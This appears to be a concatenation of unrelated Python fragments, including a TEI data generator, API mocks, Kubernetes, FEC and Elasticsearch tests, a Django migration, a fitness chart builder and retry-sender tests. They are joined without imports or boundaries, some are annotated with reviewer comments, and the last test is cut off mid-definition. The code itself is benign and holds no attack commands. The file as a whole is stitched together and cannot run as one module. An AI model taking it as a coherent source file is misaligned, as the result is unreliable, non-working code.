    """TEI training-data generator for the affiliation-address model.

    Configures the generic base generator with the affiliation-address
    element paths, TEI element maker and output file naming.
    """

    # Suffix appended to generated TEI training files.
    DEFAULT_TEI_FILENAME_SUFFIX = '.affiliation.tei.xml'

    def __init__(self):
        super().__init__(root_training_xml_element_path=ROOT_TRAINING_XML_ELEMENT_PATH, training_xml_element_path_by_label=TRAINING_XML_ELEMENT_PATH_BY_LABEL, element_maker=TEI_E, default_tei_filename_suffix=AffiliationAddressTeiTrainingDataGenerator.DEFAULT_TEI_FILENAME_SUFFIX, default_data_filename_suffix=None, default_tei_sub_directory='affiliation-address/corpus')
def mock_api_response(monkeypatch, status, json_data):
    """Patch the CFDA view's ``post`` call to return a canned response.

    The stub response exposes ``status_code()`` and ``json()`` returning the
    given *status* and *json_data*, regardless of the call arguments.
    """
    class MockResponse():
        def __init__(self, status, json_data):
            self.status = status
            self.json_data = json_data

        def status_code(self):
            return self.status

        def json(self):
            return self.json_data

    def _fake_post(*args, **kwargs):
        # Ignore all arguments; always hand back the canned response.
        return MockResponse(status, json_data)

    monkeypatch.setattr('usaspending_api.references.v2.views.cfda.post', _fake_post)
class TorchHub(Analyser):
    """Analyser that runs an arbitrary torch.hub model over an element's images.

    The hub repo and its positional/keyword load arguments come from the
    config; per-image detection results are converted to CvJson predictions.
    """

    in_etype = Etype.Any
    out_etype = Etype.Any

    def pre_analyse(self, config):
        """Load the model from torch hub, defaulting missing args/kwargs."""
        if (config.get('args') is None):
            config['args'] = []
        if (config.get('kwargs') is None):
            config['kwargs'] = {}
        self.model = torch.hub.load(config['repo'], *config['args'], **config['kwargs'])
        # Confidence / IoU thresholds. NOTE(review): setting .conf/.iou looks
        # specific to YOLOv5-style hub models — confirm other repos expose them.
        self.model.conf = 0.5
        self.model.iou = 0.45
        self.logger('Model loaded from remote.')

    def analyse_element(self, element, config):
        """Run batched inference over all images in *element*, return CvJson predictions."""
        imgs = [Image.open(x) for x in element.paths]
        results = self.model(imgs).tolist()
        self.logger(f'Batched inference successfully run for element {element.id}.')

        def get_preds(img_path):
            # Map each image path back to its position in the batched results.
            idx = element.paths.index(img_path)
            result = results[idx]
            return [cls_and_conf(p, result.names) for p in result.pred]
        return Etype.CvJson.from_preds(element, get_preds)
class TestK8sTaskExecutor(unittest.TestCase):
    """Tests for KubernetesTaskExecutor start/stop behaviour.

    The patch targets previously sat as bare string statements (stripped
    decorators); they are restored as ``@mock.patch`` decorators. Decorators
    inject mocks bottom-up: the last decorator maps to the first mock
    argument after ``self``.
    """

    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._is_task_submitted')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.run_pod')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
    def test_run_existed_task(self, mock_client, mock_run_pod, mock_is_submmitted, mock_list_pods):
        # An already-submitted task execution must not start a second pod.
        executor = KubernetesTaskExecutor()
        key = TaskExecutionKey(1, 'task', 2)
        mock_is_submmitted.return_value = True
        executor.start_task_execution(key)
        mock_run_pod.assert_not_called()

    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
    def test__is_task_submitted(self, mock_client, mock_list_pods):
        executor = KubernetesTaskExecutor()
        key = TaskExecutionKey(1, 'task', 3)
        expected = []
        # Pods with non-matching seq_number (0 and 1) -> not submitted.
        for i in range(2):
            mock_pod = mock.MagicMock()
            mock_pod.metadata.annotations = {'workflow_execution_id': 1, 'task_name': 'task', 'seq_number': i}
            expected.append(mock_pod)
        mock_list_pods.return_value = expected
        self.assertFalse(executor._is_task_submitted(key))
        # Adding a pod with the matching seq_number (3) -> submitted.
        mock_pod = mock.MagicMock()
        mock_pod.metadata.annotations = {'workflow_execution_id': 1, 'task_name': 'task', 'seq_number': 3}
        expected.append(mock_pod)
        mock_list_pods.return_value = expected
        self.assertTrue(executor._is_task_submitted(key))

    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.run_pod')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
    @mock.patch('ai_flow.task_executor.common.task_executor_base.TaskExecutorBase.generate_command')
    def test_start_task_execution_without_template(self, mock_command, mock_client, mock_run_pod, mock_list_pods):
        executor = KubernetesTaskExecutor()
        executor.kube_config.config['pod_template_file'] = None
        key = TaskExecutionKey(1, 'task', 2)
        mock_list_pods.return_value = []
        executor.start_task_execution(key)
        mock_command.assert_called_once_with(key)
        mock_run_pod.assert_called_once()

    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.run_pod')
    @mock.patch('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
    @mock.patch('ai_flow.task_executor.common.task_executor_base.TaskExecutorBase.generate_command')
    def test_start_task_execution(self, mock_command, mock_client, mock_run_pod, mock_list_pods):
        executor = KubernetesTaskExecutor()
        template_file = os.path.join(os.path.dirname(__file__), 'base_pod.yaml')
        executor.kube_config.config['pod_template_file'] = template_file
        key = TaskExecutionKey(1, 'task', 2)
        mock_list_pods.return_value = []
        executor.start_task_execution(key)
        mock_command.assert_called_once_with(key)
        mock_run_pod.assert_called_once()

    @mock.patch('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._delete_pod')
    @mock.patch('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
    def test_stop_task_execution(self, mock_list_pods, mock_delete_func, mock_client):
        executor = KubernetesTaskExecutor()
        key = TaskExecutionKey(1, 'task', 2)
        mock_list_pods.return_value = [mock.MagicMock()]
        executor.stop_task_execution(key)
        mock_delete_func.assert_called_once()
def test_interpolate_color() -> None:
    """interpolate_color blends two hex colors; the factor is clamped to [0, 1]."""
    cases = [
        (0, '#000000'),
        (1, '#ffffff'),
        (0.5, '#7f7f7f'),
        ((- 100), '#000000'),   # far below range -> clamped to start color
        (12345, '#ffffff'),     # far above range -> clamped to end color
    ]
    for factor, expected in cases:
        assert interpolate_color('#000000', '#ffffff', factor) == expected
class Affine(AffineOp, Elementwise):
    """Elementwise affine bijector with clamped log-scale.

    Stores the clamp bounds and sigmoid bias used by the affine operation;
    parameter initialization is delegated to the AffineOp base.
    """

    def __init__(self, params_fn: Optional[flowtorch.Lazy]=None, *, shape: torch.Size, context_shape: Optional[torch.Size]=None, log_scale_min_clip: float=(- 5.0), log_scale_max_clip: float=3.0, sigmoid_bias: float=2.0) -> None:
        super().__init__(params_fn, shape=shape, context_shape=context_shape)
        # Clamp bounds for the log-scale term (numerical stability).
        self.log_scale_min_clip = log_scale_min_clip
        self.log_scale_max_clip = log_scale_max_clip
        # Bias applied in the sigmoid parameterization of the scale.
        self.sigmoid_bias = sigmoid_bias
class TestOperationsLog(ApiBaseTest):
    """Integration tests for the operations-log endpoint filters."""

    def setUp(self):
        super().setUp()
        # Fixture rows covering status, receipt/coverage/completion dates.
        factories.OperationsLogFactory(candidate_committee_id='00', report_year=2000, status_num=1)
        factories.OperationsLogFactory(candidate_committee_id='01', report_year=2012, status_num=0)
        factories.OperationsLogFactory(candidate_committee_id='02', report_year=2014, status_num=1)
        factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, receipt_date=datetime.date(2017, 3, 1))
        factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, coverage_end_date=datetime.date(2018, 4, 30))
        factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, transaction_data_complete_date=datetime.date(2016, 10, 15))

    def test_empty_query(self):
        results = self._results(api.url_for(OperationsLogView, candidate_committee_id='10', report_year=2030))
        self.assertEqual(len(results), 0)

    def test_search_cand_cmte_id(self):
        response = self.app.get(api.url_for(OperationsLogView, candidate_committee_id='01', report_year=2012))
        self.assertEqual(response.status_code, 200)

    def test_unverified_reports(self):
        results = self._results(api.url_for(OperationsLogView, candidate_committee_id='01', status_num=0))
        self.assertEqual(len(results), 1)
        for result in results:
            # Was `assertTrue(1, ...)`, which always passes; assert the
            # filtered status explicitly.
            self.assertEqual(result['status_num'], 0)

    def test_verified_reports(self):
        results = self._results(api.url_for(OperationsLogView, candidate_committee_id='02', status_num=1))
        self.assertEqual(len(results), 1)
        for result in results:
            # Was `assertTrue(1, ...)`, which always passes; assert the
            # filtered status explicitly.
            self.assertEqual(result['status_num'], 1)

    def test_receipt_date_range(self):
        min_date = datetime.date(2017, 1, 1)
        max_date = datetime.date(2017, 12, 31)
        # Was `all(each for each in results if cond)` which is vacuously true;
        # the condition belongs in the predicate, not the filter.
        results = self._results(api.url_for(OperationsLogView, min_receipt_date=min_date))
        self.assertTrue(all((each['receipt_date'] >= min_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, max_receipt_date=max_date))
        self.assertTrue(all((each['receipt_date'] <= max_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, min_receipt_date=min_date, max_receipt_date=max_date))
        self.assertTrue(all((min_date.isoformat() <= each['receipt_date'] <= max_date.isoformat()) for each in results))

    def test_coverage_end_date_range(self):
        min_date = datetime.date(2018, 1, 1)
        max_date = datetime.date(2018, 12, 31)
        results = self._results(api.url_for(OperationsLogView, min_coverage_end_date=min_date))
        self.assertTrue(all((each['coverage_end_date'] >= min_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, max_coverage_end_date=max_date))
        self.assertTrue(all((each['coverage_end_date'] <= max_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, min_coverage_end_date=min_date, max_coverage_end_date=max_date))
        self.assertTrue(all((min_date.isoformat() <= each['coverage_end_date'] <= max_date.isoformat()) for each in results))

    def test_transaction_data_complete_date_range(self):
        min_date = datetime.date(2016, 1, 1)
        max_date = datetime.date(2016, 12, 31)
        results = self._results(api.url_for(OperationsLogView, min_transaction_data_complete_date=min_date))
        self.assertTrue(all((each['transaction_data_complete_date'] >= min_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, max_transaction_data_complete_date=max_date))
        self.assertTrue(all((each['transaction_data_complete_date'] <= max_date.isoformat()) for each in results))
        results = self._results(api.url_for(OperationsLogView, min_transaction_data_complete_date=min_date, max_transaction_data_complete_date=max_date))
        self.assertTrue(all((min_date.isoformat() <= each['transaction_data_complete_date'] <= max_date.isoformat()) for each in results))

    def test_invalid_image_number(self):
        response = self.app.get(api.url_for(OperationsLogView, beginning_image_number='fec-12345'))
        self.assertEqual(response.status_code, 422)
class Migration(migrations.Migration):
    # Adds earliest/latest transaction_search foreign keys to awardsearch.
    # db_constraint=False: the link is logical only, no DB-level FK is created.

    dependencies = [('search', '0029_link_subaward_search_to_transaction_search')]
    operations = [migrations.AddField(model_name='awardsearch', name='earliest_transaction_search', field=models.ForeignKey(db_constraint=False, help_text='The earliest transaction in transaction_search table by action_date and mod associated with this award', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='earliest_for_award', to='search.transactionsearch')), migrations.AddField(model_name='awardsearch', name='latest_transaction_search', field=models.ForeignKey(db_constraint=False, help_text='The latest transaction in transaction_search table by action_date and mod associated with this award', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='latest_for_award', to='search.transactionsearch'))]
def test_task_node_with_overrides():
    """TaskNode overrides (resources + extended resources) survive an IDL round trip."""
    cpu_request = Resources.ResourceEntry(Resources.ResourceName.CPU, '1')
    cpu_limit = Resources.ResourceEntry(Resources.ResourceName.CPU, '2')
    resources = Resources(requests=[cpu_request], limits=[cpu_limit])
    extended = tasks_pb2.ExtendedResources(gpu_accelerator=T4.to_flyte_idl())
    task_node = _workflow.TaskNode(reference_id=_generic_id, overrides=_workflow.TaskNodeOverrides(resources, extended))
    assert task_node.overrides.resources.requests == [cpu_request]
    assert task_node.overrides.resources.limits == [cpu_limit]
    assert task_node.overrides.extended_resources.gpu_accelerator == T4.to_flyte_idl()
    # Serialize and parse back; the round-tripped node must compare equal.
    round_tripped = _workflow.TaskNode.from_flyte_idl(task_node.to_flyte_idl())
    assert round_tripped == task_node
def test_custom_form_complex_fields_complete(db, client, user, jwt):
    """PATCHing a speaker with complete complex custom-form fields persists them."""
    speaker = get_complex_custom_form_speaker(db, user)
    attributes = {'name': 'Areeb', 'heard-from': 'Gypsie', 'complex-field-values': {'best-friend': 'Tester'}}
    payload = json.dumps({'data': {'type': 'speaker', 'id': str(speaker.id), 'attributes': attributes}})
    response = client.patch(f'/v1/speakers/{speaker.id}', content_type='application/vnd.api+json', headers=jwt, data=payload)
    # Reload from the DB to observe what was actually persisted.
    db.session.refresh(speaker)
    assert response.status_code == 200
    assert speaker.name == 'Areeb'
    assert speaker.heard_from == 'Gypsie'
    assert speaker.complex_field_values['best_friend'] == 'Tester'
def generate_daily_movement_chart(date):
    """Build the daily-movement Dash graph (per-minute MET bars) for *date*.

    Pulls per-minute Oura activity samples for the given summary date, colors
    each bar by its MET-based intensity class, and overlays Low/Med/High
    reference lines at MET 1, 3 and 7.
    """
    # Rows with class_5min IS NULL are excluded (no classified activity).
    df = pd.read_sql(sql=app.session.query(ouraActivitySamples.timestamp_local, ouraActivitySamples.met_1min, ouraActivitySamples.class_5min).filter((ouraActivitySamples.summary_date == date), (ouraActivitySamples.class_5min != None)).statement, con=engine, index_col='timestamp_local')
    # Release the scoped session back to the pool once the frame is loaded.
    app.session.remove()
    df['color'] = df['met_1min'].apply(daily_movement_color)
    df['action'] = df['met_1min'].apply((lambda x: daily_movement_color(x, name=True)))
    df['movement_tooltip'] = ['<b>{}:</b> {} MET'.format(x, y) for (x, y) in zip(df['action'], df['met_1min'])]
    # Y axis tops out at 8 unless the day's max MET exceeds the High line (7).
    return dcc.Graph(id='daily-movement-chart', className='col-lg-12', config={'displayModeBar': False}, figure={'data': [go.Bar(x=df.index, y=df['met_1min'], text=df['movement_tooltip'], hoverinfo='text+x', marker={'color': df['color'].tolist()}), go.Scatter(name='Low', x=df.index, y=[1 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False), go.Scatter(name='Med', x=df.index, y=[3 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False), go.Scatter(name='High', x=df.index, y=[7 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False)], 'layout': go.Layout(height=150, transition=dict(duration=transition), font=dict(size=10, color=white), xaxis=dict(showticklabels=True, tickformat='%I:%M %p', showgrid=False, showline=True, color=white), yaxis=dict(showticklabels=True, range=[0, (df['met_1min'].max() if (df['met_1min'].max() > 7) else 8)], tickvals=[1, 3, 7], ticktext=['Low ', 'Med ', 'High '], showgrid=True), showlegend=False, margin={'l': 40, 'b': 30, 't': 0, 'r': 40}, hovermode='x')})
class StringSub(StringTransform):
    """Reversible transform replacing every occurrence of one substring with another.

    Applying substitutes ``substring`` -> ``replacement``; reverting swaps the
    direction. Note the round trip is only lossless when neither string
    occurs inside the other's replacements.
    """

    def __init__(self, substring: str, replacement: str, *, reversible: bool=True):
        super().__init__(reversible)
        self.substring = substring
        self.replacement = replacement

    @staticmethod
    def _substitute(text: str, old: str, new: str) -> str:
        # Single place implementing the replacement in either direction.
        return text.replace(old, new)

    def _apply(self, string: str) -> str:
        return self._substitute(string, self.substring, self.replacement)

    def _revert(self, string: str) -> str:
        return self._substitute(string, self.replacement, self.substring)
class ItemTests(unittest.TestCase):
    """Unit tests for the Item QBO model."""

    def test_unicode(self):
        # str() of an Item is its Name.
        obj = Item()
        obj.Name = 'test'
        self.assertEqual(str(obj), 'test')

    def test_to_ref(self):
        obj = Item()
        obj.Name = 'test'
        obj.Id = 100
        reference = obj.to_ref()
        self.assertEqual(reference.name, 'test')
        self.assertEqual(reference.type, 'Item')
        self.assertEqual(reference.value, 100)

    def test_valid_object_name(self):
        obj = Item()
        qb_client = QuickBooks()
        self.assertTrue(qb_client.isvalid_object_name(obj.qbo_object_name))
class Local(DeployBase):
    """Local deployment target: runs the app for a model on this machine."""

    def __init__(self, config_json=None, credentials_json=None):
        DeployBase.__init__(self, config_json=config_json, credentials_json=credentials_json)

    def deploy(self, model_id):
        """Launch the app associated with *model_id* based on its app type.

        Only streamlit apps are runnable today; swagger and dash are
        recognized but not yet implemented.
        """
        app_type = self._app_type(model_id)
        if app_type == 'streamlit':
            streamlit_app = StreamlitApp()
            streamlit_app.run(model_id)
        elif app_type == 'swagger':
            pass  # not implemented yet
        elif app_type == 'dash':
            pass  # not implemented yet
def test_build_dirhtml_from_template(temp_with_override, cli):
    """Creating a book from the template and building with --builder dirhtml
    should produce index pages under _build/dirhtml."""
    book_path = temp_with_override / 'new_book'
    cli.invoke(commands.create, book_path.as_posix())
    result = cli.invoke(commands.build, [book_path.as_posix(), '-n', '-W', '--builder', 'dirhtml'])
    assert result.exit_code == 0, result.output
    out_dir = book_path / '_build' / 'dirhtml'
    assert (out_dir / 'index.html').exists()
    assert (out_dir / 'intro' / 'index.html').exists()
def _bump_protocol_specification_id(package_path: Path, configuration: ProtocolConfig) -> None:
    """Bump the minor version of the protocol specification id and persist it.

    The updated configuration is written back to the package's protocol
    config file under *package_path*.
    """
    current_id: PublicId = configuration.protocol_specification_id
    bumped_version = str(semver.VersionInfo.parse(current_id.version).bump_minor())
    configuration.protocol_specification_id = PublicId(current_id.author, current_id.name, bumped_version)
    config_file = package_path / DEFAULT_PROTOCOL_CONFIG_FILE
    with config_file.open('w') as file_output:
        ConfigLoaders.from_package_type(configuration.package_type).dump(configuration, file_output)
def extractMiirakuruWordpressCom(item):
    """Parse a release item from miirakuru.wordpress.com.

    Returns None for previews or titles with no chapter/volume info, a release
    message for recognized tags, and False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    mappings = [
        ('rett', 'The Story of Rett Pott', 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series_name, translation_type in mappings:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=translation_type)
    return False
def derivative_upward_kernel(fft_grid, order=1):
    """Build the upward-derivative filter for a 2D FFT grid.

    Converts the grid's frequency coordinates (dims[0] = northing,
    dims[1] = easting) to wavenumbers k = 2*pi*f and returns |k|**order.
    """
    dims = fft_grid.dims
    # Angular wavenumbers along each horizontal direction.
    k_easting = (2 * np.pi) * fft_grid.coords[dims[1]]
    k_northing = (2 * np.pi) * fft_grid.coords[dims[0]]
    return np.sqrt((k_easting ** 2) + (k_northing ** 2)) ** order
def find_music_dir():
    """Locate the user's music directory.

    Lookup order: the XDG_MUSIC_DIR environment variable, the XDG
    'user-dirs.dirs' config, then ~/Music and ~/music. Returns None when
    nothing is found.
    """
    env_dir = os.environ.get('XDG_MUSIC_DIR')
    if env_dir is not None:
        return env_dir
    conf = open_first_xdg_config('user-dirs.dirs')
    if conf is not None:
        prefix = 'XDG_MUSIC_DIR='
        for line in conf:
            if not line.startswith(prefix):
                continue
            # Value is shell-quoted; take the first token.
            value = shlex.split(line[len(prefix):])[0]
            if value.startswith('$HOME/'):
                # Keep the '/' after $HOME so expansion yields '~/...'.
                return os.path.expanduser('~' + value[len('$HOME'):])
            if value.startswith('/'):
                return value
            # Relative values are not supported; fall through to defaults.
            break
    for candidate in ('~/Music', '~/music'):
        expanded = os.path.expanduser(candidate)
        if os.path.isdir(expanded):
            return expanded
    return None
class TestGetIndices(TestCase):
    """Tests for get_indices() against a mocked Elasticsearch client."""

    IDX1 = 'index-2016.03.03'
    IDX2 = 'index-2016.03.04'
    SETTINGS = {IDX1: {'state': 'open'}, IDX2: {'state': 'open'}}

    def _make_client(self, settings):
        # Mock client whose index-settings call returns *settings*.
        mock_client = Mock()
        mock_client.indices.get_settings.return_value = settings
        return mock_client

    def test_client_exception(self):
        # A client-side failure must surface as FailedExecution.
        client = self._make_client(self.SETTINGS)
        client.indices.get_settings.side_effect = FAKE_FAIL
        with pytest.raises(FailedExecution):
            get_indices(client)

    def test_positive(self):
        client = self._make_client(self.SETTINGS)
        self.assertEqual([self.IDX1, self.IDX2], sorted(get_indices(client)))

    def test_empty(self):
        client = self._make_client({})
        self.assertEqual([], get_indices(client))
@pytest.mark.parametrize('cls', load_class_with_subfeature())
class TestApiClass():
    """Provider conformance checks, parametrized over every provider class.

    The original leading-dot `.parametrize(...)` line was a syntax error
    (stripped `@pytest.mark.` prefix); the marker is restored here.
    """

    def test_issubclass(self, cls: ProviderInterface):
        # Every provider must derive from the common interface.
        assert issubclass(cls, ProviderInterface), f'Please inherit {cls} from ProviderInterface'

    def test_info_file_exists(self, cls: ProviderInterface):
        provider = cls.provider_name
        info = load_provider(ProviderDataEnum.INFO_FILE, provider)
        assert info, 'info file does not exist'

    def test_version_exists(self, cls: ProviderInterface):
        provider = cls.provider_name
        info = load_provider(ProviderDataEnum.INFO_FILE, provider)
        # 'version' may live on the subfeature itself or on each of its phases.
        for feature in info:
            for subfeature in info[feature]:
                if (not info[feature][subfeature].get('version')):
                    for phase in info[feature][subfeature]:
                        assert ('version' in info[feature][subfeature][phase]), "missing 'version' property"
                else:
                    assert ('version' in info[feature][subfeature]), "missing 'version' property"

    def test_implemented_features_documented(self, cls: ProviderInterface):
        provider = cls.provider_name
        info = load_provider(ProviderDataEnum.INFO_FILE, provider)
        implemented_features = list_features(provider_name=provider)
        for (_, feature, subfeature, *phase) in implemented_features:
            if phase:
                feature_info = info.get(feature, {}).get(subfeature, {}).get(phase[0], {})
            else:
                feature_info = info.get(feature, {}).get(subfeature, {})
            assert feature_info, f"Please add {(feature, subfeature, (phase[0] if phase else ''))} to info.json file of {cls.__name__}"
class ExcludeFieldsMixin(object):
    """Serializer mixin that drops fields named in ``context['exclude']``.

    Exclude names are resolved relative to this serializer's position in the
    nested serializer hierarchy; names addressing deeper levels (those still
    containing the expand delimiter) are left for nested serializers.
    """

    def get_fields(self):
        fields = super(ExcludeFieldsMixin, self).get_fields()
        try:
            exclude = self.context['exclude']
        except KeyError:
            # No exclusions requested.
            return fields
        hierarchy = _get_serializer_hierarchy(self)
        exclude_nested_names = _get_nested_field_names(hierarchy, exclude)
        # Only names addressing THIS level (no delimiter left) are removed here.
        exclude_names = {n for n in exclude_nested_names if (EXPAND_DELIMITER not in n)}
        unmatched_names = exclude_names.difference(set(fields))
        if unmatched_names:
            # Fail loudly on typos rather than silently ignoring them.
            raise ValueError('{0} fields not found on serializer "{1}"'.format(_field_names_list(unmatched_names), self.__class__.__name__))
        return OrderedDict(((name, field) for (name, field) in fields.items() if (name not in exclude_names)))
class Cutting2DMazeState():
    """Immutable snapshot of a 2D cutting-stock environment state.

    Records the current piece inventory, the inventory capacity, the piece
    size currently demanded and the size of a raw (uncut) piece.
    """

    def __init__(self, inventory: [(int, int)], max_pieces_in_inventory: int, current_demand: (int, int), raw_piece_size: (int, int)):
        self.max_pieces_in_inventory = max_pieces_in_inventory
        self.current_demand = current_demand
        self.raw_piece_size = raw_piece_size
        # Shallow copy so later mutations of the caller's list don't leak in.
        self.inventory = inventory.copy()
class TestCharacters(BaseEvenniaTest):
    """Tests for EvAdventureCharacter abilities, healing, damage and payment."""

    def setUp(self):
        super().setUp()
        self.character = create.create_object(EvAdventureCharacter, key='testchar')

    def test_abilities(self):
        # NOTE(review): assumes strength defaults to 1 so 1 + 2 == 3 —
        # confirm against EvAdventureCharacter defaults.
        self.character.strength += 2
        self.assertEqual(self.character.strength, 3)

    def test_heal(self):
        self.character.hp = 0
        self.character.hp_max = 8
        self.character.heal(1)
        self.assertEqual(self.character.hp, 1)
        # Healing is capped at hp_max.
        self.character.heal(100)
        self.assertEqual(self.character.hp, 8)

    def test_at_damage(self):
        self.character.hp = 8
        self.character.at_damage(5)
        self.assertEqual(self.character.hp, 3)

    def test_at_pay(self):
        self.character.coins = 100
        result = self.character.at_pay(60)
        self.assertEqual(result, 60)
        self.assertEqual(self.character.coins, 40)
        # Paying more than available hands over only what is left.
        result = self.character.at_pay(100)
        self.assertEqual(result, 40)
        self.assertEqual(self.character.coins, 0)
class TestMatrixStoreConnection(SimpleTestCase):
    """Tests for the MatrixStore connection built from a DataFactory.

    setUpClass/tearDownClass previously lacked @classmethod, so unittest's
    class-level invocation would fail with a missing-argument TypeError;
    the decorators (and the conventional super() calls) are restored.
    """

    @classmethod
    def setUpClass(cls):
        # Building the matrixstore is expensive; do it once per class.
        super().setUpClass()
        cls.factory = DataFactory()
        cls.factory.create_all(start_date='2018-06-01', num_months=6, num_practices=6, num_presentations=6)
        cls.matrixstore = matrixstore_from_data_factory(cls.factory)

    def test_practice_offsets(self):
        practice_codes = sorted((p['code'] for p in self.factory.practices))
        expected_offsets = dict(zip(practice_codes, range(len(practice_codes))))
        self.assertEqual(self.matrixstore.practice_offsets, expected_offsets)

    def test_date_offsets(self):
        dates = sorted((m[:10] for m in self.factory.months))
        expected_offsets = dict(zip(dates, range(len(dates))))
        self.assertEqual(self.matrixstore.date_offsets, expected_offsets)

    def test_practices(self):
        expected_practices = sorted((p['code'] for p in self.factory.practices))
        self.assertEqual(self.matrixstore.practices, expected_practices)

    def test_dates(self):
        expected_dates = sorted((m[:10] for m in self.factory.months))
        self.assertEqual(self.matrixstore.dates, expected_dates)

    def test_query(self):
        excluded_code = self.factory.presentations[0]['bnf_code']
        results = self.matrixstore.query('SELECT bnf_code, items FROM presentation WHERE bnf_code != ?', [excluded_code])
        results = list(results)
        for (bnf_code, items_matrix) in results:
            self.assertNotEqual(bnf_code, excluded_code)
            self.assertIsInstance(items_matrix[(0, 0)], numbers.Number)
        self.assertGreaterEqual(len(results), 1)

    def test_query_one(self):
        target_code = self.factory.presentations[0]['bnf_code']
        (bnf_code, items_matrix) = self.matrixstore.query_one('SELECT bnf_code, items FROM presentation WHERE bnf_code = ?', [target_code])
        self.assertEqual(bnf_code, target_code)
        self.assertIsInstance(items_matrix[(0, 0)], numbers.Number)

    def test_matrix_sum(self):
        target_codes = [p['bnf_code'] for p in self.factory.presentations][:3]
        items_matrix = self.matrixstore.query_one('SELECT MATRIX_SUM(items) FROM presentation WHERE bnf_code IN (?, ? ,?)', target_codes)[0]
        # Recompute the expected per-(practice, month) sums from the raw
        # prescribing fixtures and compare cell by cell.
        items_dict = defaultdict(int)
        for p in self.factory.prescribing:
            if (p['bnf_code'] in target_codes):
                items_dict[(p['practice'], p['month'][:10])] += p['items']
        for (practice, row_offset) in self.matrixstore.practice_offsets.items():
            for (date, col_offset) in self.matrixstore.date_offsets.items():
                value = items_matrix[(row_offset, col_offset)]
                expected_value = items_dict[(practice, date)]
                self.assertEqual(value, expected_value)

    @classmethod
    def tearDownClass(cls):
        cls.matrixstore.close()
        super().tearDownClass()
class TestRetryingSender():
    """Tests for RetryingSender's retry and rate-limit handling (sync + async).

    The bare `.asyncio` lines were syntax errors (stripped `@pytest.mark.`
    prefixes); the pytest-asyncio markers are restored.
    """

    def test_repr(self):
        s = RetryingSender()
        assert repr(s).startswith('RetryingSender(')

    def test_rate_limited_request_retried_after_set_seconds(self):
        time = MagicMock()
        fail = rate_limit_response()
        success = ok_response()
        sender = mock_sender(fail, success)
        s = RetryingSender(sender=sender)
        with patch((module + '.time'), time):
            s.send(mock_request())
        # Retry-After value plus a one second safety margin.
        time.sleep.assert_called_once_with((1 + 1))

    @pytest.mark.asyncio
    async def test_async_rate_limited_request_retried_after_set_seconds(self):
        asyncio = AsyncMock()
        fail = rate_limit_response()
        success = ok_response()
        sender = mock_sender(fail, success, is_async=True)
        s = RetryingSender(sender=sender)
        with patch((module + '.asyncio'), asyncio):
            (await s.send(mock_request()))
        asyncio.sleep.assert_called_once_with((1 + 1))

    def test_default_retry_after_is_one(self):
        time = MagicMock()
        fail = rate_limit_response()
        # Without a Retry-After header, the default wait of 1 is used.
        del fail.headers['Retry-After']
        success = ok_response()
        sender = mock_sender(fail, success)
        s = RetryingSender(sender=sender)
        with patch((module + '.time'), time):
            s.send(mock_request())
        time.sleep.assert_called_once_with((1 + 1))

    @pytest.mark.asyncio
    async def test_async_default_retry_after_is_one(self):
        asyncio = AsyncMock()
        fail = rate_limit_response()
        del fail.headers['Retry-After']
        success = ok_response()
        sender = mock_sender(fail, success, is_async=True)
        s = RetryingSender(sender=sender)
        with patch((module + '.asyncio'), asyncio):
            (await s.send(mock_request()))
        asyncio.sleep.assert_called_once_with((1 + 1))

    def test_failing_request_but_no_retries_returns_failed(self):
        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, success)
        s = RetryingSender(sender=sender)
        r = s.send(mock_request())
        assert (r is fail)

    @pytest.mark.asyncio
    async def test_async_failing_request_but_no_retries_returns_failed(self):
        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, success, is_async=True)
        s = RetryingSender(sender=sender)
        r = (await s.send(mock_request()))
        assert (r is fail)

    def test_failing_request_retried_max_times(self):
        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, fail, fail, success)
        s = RetryingSender(retries=2, sender=sender)
        with patch((module + '.time'), MagicMock()):
            s.send(mock_request())
        # Initial attempt plus two retries.
        assert (sender.send.call_count == 3)

    @pytest.mark.asyncio
    async def test_async_failing_request_retried_max_times(self):
